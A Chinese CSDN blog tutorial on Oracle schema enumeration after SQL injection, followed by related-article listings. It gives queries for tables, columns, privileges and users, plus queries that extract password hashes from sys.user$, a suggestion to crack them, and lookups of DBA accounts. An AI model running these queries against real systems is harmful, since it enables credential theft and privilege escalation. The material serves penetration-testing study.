SQL Injection(2)

Oracle数据库模式枚举
最新推荐文章于 2024-09-28 17:34:16 发布
原创 最新推荐文章于 2024-09-28 17:34:16 发布 · 296 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何在Oracle数据库中枚举数据库模式,包括查询当前用户表、枚举应用表信息及列详情,并提供了查询权限的方法。此外,还讨论了如何获取数据库中的所有用户及其相关信息。

那么,假如后台DBMS为Oracle时我们该如何枚举数据库模式呢?
使用Oracle时,我们需要注意:通常一次只能访问一个数据库(我们一般通过特定的链接来访问Oracle中的数据库)且应用访问多个数据库时通常使用不同的链接。因此,与SQL Server和MySQL不同,寻找数据库模式时Oracle无法枚举存在的数据库。

0x01 查询当前用户表

在应用环境下,它们通常是数据库中的应用表:

select table_name from user_tables;

扩展该语句可以查看数据库中的所有表以及表的所有者

select owner,table_name from all_tables;

0x02 枚举更多关于应用表的信息

通过枚举可以确定表中出现的列数和行数,||是Oracle中的字符串链接

select a.table_name||'['||count(*)||']='||num_rows from user_tab_columns a,user_tables b where a.table_name=b.table_name group by a.table_name,num_rows

当然也可以枚举所有可访问或可用的表

select b.owner||'.'||a.table_name||'['||count(*)||']='||num_rows from all_tab_columns a,all_tables b where a.table_name=b.table_name group by b.owner,a.table_name,num_rows

可以枚举每张表的列和数据烈性来完整发现数据库模式

select table_name||':'||column_name||':'||data_type||':'||column_id from user_tab_columns order by table_name,column_id

0x03 查询权限

获取当前用户的系统权限:

select * from user_sys_privs;    -- show system privileges of the current user

获取当前用户的角色权限:

select * from user_role_privs;   -- show role privileges of the current user

获取当前用户的表格权限:

select * from user_tab_privs;

获取当前用户的列权限:

select * from user_col_privs;

想获取所有可能的权限列表,则替换上述查询语句中的user字符串,如下所示
获取所有系统权限

select * from all_sys_privs

获取所有角色权限:

select * from all_role_privs

获取所有表格权限:

select * from all_tab_privs

获取所有列权限

select * from all_col_privs

当护具库模式列表以及当前的用户信息都获取到之后,需要枚举数据库中其他信息,比如数据库中的所有用户。

select username,created from all_users order by created desc;

该查询有一个优点,默认情况下,它可以由任意数据库用户执行

还可以根据所使用的数据库版本来查询其他项。比如在Oracle 10g Re1.2(如果没有错的话)以后的版本,普通用户可以使用这样检索数据库的用户名和哈希口令

select name,password,astatus from sys.user$ where type#>0 and length(password)=16 (priv),astatus (0=open,9=locked&expired)

可以使用公共可用的工具来测试或破解哈希口令以获取高级数据库账户。在Oracle 11g中,Oracle已经修改了所使用口令的哈希算法,而且哈希口令位于不同的列中(spare4)

select name,spare4 from sys.user$ where type#>0 and length(spare4)=62

如果当前已经是高级用户

select table_name,column_name,encryption_alg,salt from dba_encrypted_columns;

如果已经是高级用户可以了解存在哪些DBA账户

select grantee,granted_role,admin_option,default_role from dba_role_privs where granted_role='DBA'

当然,手动枚举是很困难的,可以使用自动化工具,比如sqlmap以后会专门写关于这些工具的使用

SQL注入(SQL Injection
weixin_45880844的博客
04-09 452
SQL注入是一种常见的网络安全攻击手段,攻击者通过在输入字段中插入恶意的SQL代码,试图干扰或篡改数据库的查询逻辑,从而获取、篡改或删除数据库中的数据。攻击者通过插入特定的SQL语句,观察应用程序的响应(通常是页面内容的变化),从而判断SQL语句是否被正确执行。如果页面显示“未找到用户”,说明SQL语句被正确执行,攻击者可以通过这种方式逐字猜测数据库中的数据。攻击者通过插入特定的SQL语句,使数据库执行耗时操作,从而判断SQL语句是否被正确执行。对用户输入进行严格的验证,确保输入符合预期的格式。
精选资源
Advanced SQL Injection.ppt
10-27
本讲座“Advanced SQL Injection”由Joe McCray主讲,深入探讨了SQL注入的高级技术,包括背景、基本攻击方法、实战案例、权限升级、过滤与入侵防御系统(IDS)规避、JavaScript验证以及服务器端过滤等主题。...
sql injection violation, multi-statement not allow 最终解决方案
Ace of spades
11-01 3万+
sql injection violation, multi-statement not allowMybatis+Mysql+Druid+SpringMVC+Spring解题思路: Mybatis+Mysql+Druid+SpringMVC+Spring 本博客结合前三篇观看更顺畅: spring boot集成MyBatis,集成Druid批量更新报错multi-statement not a...
Caused by: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : DESC
热门推荐
duantianya2012的博客
01-16 8万+
Caused by: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : DESC, pos : 47 : SELECT id,odbcconfig,ip,port,user,password,desc  FROM hh_config.hh_dbconfig 问题在于DESC是sql的自有字
MyBatis与Druid数据库连接池集成监控统计后WallFilterSQL注入异常问题处理方案
纸上得来终觉浅,绝知此事要躬行
04-18 1万+
数据库连接池使用的是阿里巴巴的Druid(德鲁伊)。项目中启用了Druid的统计管理,在执行批量修改时提示;Caused by: java.sql.SQLException: sql injection violation, multi-statement not allow 。可以通过对WallConfig设置multiStatementAllow=true解决此问题,重新设置WallFilter实现。官方配置参考:https://github.com/alibaba/druid/wiki/%E9%85%
(hibernate)出现sql injection violation错误,order ?,?这里用户输入的变量不能直接嵌入到SQL语句,
weixin_37121451的博客
06-28 1826
出现sql injection violation错误,order ?,?这里用户输入的变量不能直接嵌入到SQL语句, 使用的spring-data 改配置文件,# 配置监控统计拦截的filters,去掉后监控界面sql无法统计,'wall'用于防火墙 spring.datasource.filters.sso=stat,wall 去掉wall,可以解决这个错误Hibernate: SELECT
【Mybatis】Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : WHERE,
陶洲川的博客
12-03 4万+
一、报错语句: got a Exception org.springframework.jdbc.UncategorizedSQLException: Error updating database. Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : WHERE, pos
Fortify SQL Injection
安全新司机
06-09 962
文章目录1. 问题描述2. 问题发生场景2.1 拼接 SQL 语句2.2 Mybatis 中 ${} 不正当使用2.2.1 like 场景2.2.2 order by 场景 1. 问题描述 SQL 注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 SQL 注入问题只在 SQL 的预编译过程中才能起作用 2
SQL_Injection
wanggonghanfei的博客
09-28 1181
sql注入基础介绍及诸如点判断,与一些简单的注入语句
SQL Injection with MySQL 注入分析
09-14
在案例中,当变量$id为`1' and 1=2 union select * from user where userid=1/*`时,第一条SQL语句将尝试闭合单引号并执行额外的查询。而在第二条不使用引号的语句中,恶意SQL代码将直接执行,无需闭合单引号。 ...
sql injection(SQL注入)教程
10-25
SQL注入是一种常见的网络安全威胁,它利用了应用程序对用户输入数据处理不当的问题,使得攻击者能够操纵SQL查询,获取、修改、删除数据库中的敏感信息,甚至完全控制数据库服务器。本教程将详细讲解SQL注入的各个...
精选资源
SQL_Injection_Payload:SQL注入有效负载列表
01-28
2. **类型识别**:了解目标数据库的类型(如MySQL、Oracle、SQL Server等)至关重要,因为不同的数据库系统可能有不同的语法和特性。 3. **盲注与时间基注入**:在某些情况下,攻击者可能无法直接看到注入结果,但...
细胞的数据集 一万七张 粗糙粗糙
最新发布
12-05
细胞的数据集 一万七张 粗糙粗糙
六自由度机械臂ANN人工神经网络设计:正向逆向运动学求解、正向动力学控制、拉格朗日-欧拉法推导逆向动力学方程(Matlab代码实现)
12-05
六自由度机械臂ANN人工神经网络设计:正向逆向运动学求解、正向动力学控制、拉格朗日-欧拉法推导逆向动力学方程(Matlab代码实现)内容概要:本文档围绕六自由度机械臂的ANN人工神经网络设计展开,详细介绍了正向与逆向运动学求解、正向动力学控制以及基于拉格朗日-欧拉法推导逆向动力学方程的理论与Matlab代码实现过程。文档还涵盖了PINN物理信息神经网络在微分方程求解、主动噪声控制、天线分析、电动汽车调度、储能优化等多个工程与科研领域的应用案例,并提供了丰富的Matlab/Simulink仿真资源和技术支持方向,体现了其在多学科交叉仿真与优化中的综合性价值。; 适合人群:具备一定Matlab编程基础,从事机器人控制、自动化、智能制造、电力系统或相关工程领域研究的科研人员、研究生及工程师。; 使用场景及目标:①掌握六自由度机械臂的运动学与动力学建模方法;②学习人工神经网络在复杂非线性系统控制中的应用;③借助Matlab实现动力学方程推导与仿真验证;④拓展至路径规划、优化调度、信号处理等相关课题的研究与复现。; 阅读建议:建议按目录顺序系统学习,重点关注机械臂建模与神经网络控制部分的代码实现,结合提供的网盘资源进行实践操作,并参考文中列举的优化算法与仿真方法拓展自身研究思路。
特定版本tomcat-8.0.28.zip.7z
12-05
特定版本tomcat-8.0.28.zip.7z
Java设计模式全面解析与实战应用项目_涵盖创建型模式如构造者模式工厂模式原型模式与单例模式关系型模式如责任链模式命令模式迭代器模式观察者模式解释器模式中介者模式.zip
12-05
Java设计模式全面解析与实战应用项目_涵盖创建型模式如构造者模式工厂模式原型模式与单例模式关系型模式如责任链模式命令模式迭代器模式观察者模式解释器模式中介者模式.zip
2026年系统架构设计师(第一批次)综合知识考试题库及参考答案.pdf
12-05
2026年系统架构设计师(第一批次)综合知识考试题库及参考答案.pdf
面向制造业的鲁棒机器学习集成计算流程研究(Python代码实现)
12-05
面向制造业的鲁棒机器学习集成计算流程研究(Python代码实现)内容概要:本文围绕“面向制造业的鲁棒机器学习集成计算流程研究”展开,结合Python代码实现,提出了一套适用于制造场景的机器学习建模与计算框架。该框架强调模型在工业数据噪声、缺失与动态变化下的鲁棒性,集成了数据预处理、特征工程、模型训练、集成学习与结果验证等关键步骤,并通过实际代码示例展示了流程的可操作性与实用性。研究聚焦于提升制造过程中质量预测、故障诊断与工艺优化的自动化水平,推动智能制造的落地应用。; 适合人群:具备Python编程基础,熟悉机器学习基本算法,从事智能制造、工业数据分析或相关领域研究的研发人员与工程技术人员。; 使用场景及目标:①应用于制造业中的质量控制、设备预测性维护与生产流程优化;②构建稳定可靠的工业AI模型,应对实际生产中的不确定性与数据扰动;③为科研与工程实践提供可复用的机器学习集成计算模板。; 阅读建议:建议读者结合文中提供的Python代码进行实践操作,重点关注数据鲁棒性处理与模型集成策略的设计思路,并可根据具体制造场景调整参数与模块以适配实际需求。
【航空航天工程】本科无人机专业就业方向全景解析:研发制造与行业应用全产业链岗位分布及人才需求分析
12-05
内容概要:本文全面解析了本科层次无人机专业(正式名称为“无人驾驶航空器系统工程”)的就业方向,涵盖研发制造、行业应用、服务管理、体制内与科研院所及新兴交叉领域五大板块,详细介绍了各领域的核心岗位、代表企业、薪资水平和发展前景,并通过对比表分析了不同方向的薪资、稳定性、入行门槛与发展空间。文章指出该专业就业率高达95%以上,人才缺口超450万,属于低空经济背景下的热门专业。; 适合人群:本科阶段学习无人机相关专业的学生,以及对无人机行业感兴趣、计划从事技术研发或行业应用的高校学子;具备一定工科基础、希望明确职业发展方向的学习者。; 使用场景及目标:①帮助学生全面了解无人机专业毕业后可选择的职业路径;②指导个人根据兴趣与能力规划学业与技能发展方向,提升就业竞争力;③为企业招聘、院校课程设置提供参考依据; 阅读建议:结合自身优势选择“无人机+行业知识”复合发展路径,尽早考取CAAC无人机驾驶员执照,优先争取头部企业实习机会,关注AI、5G、载人无人机等前沿趋势以把握未来机遇。
SQL Injection检测与防范教程
2. 什麼是SQL Injection SQL Injection攻击是指攻击者通过在Web表单或其他用户输入点注入恶意的SQL代码,以欺骗服务器执行非预期的数据库操作。这可能导致敏感信息泄露、数据篡改或系统权限提升。 3. SQL Injection...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值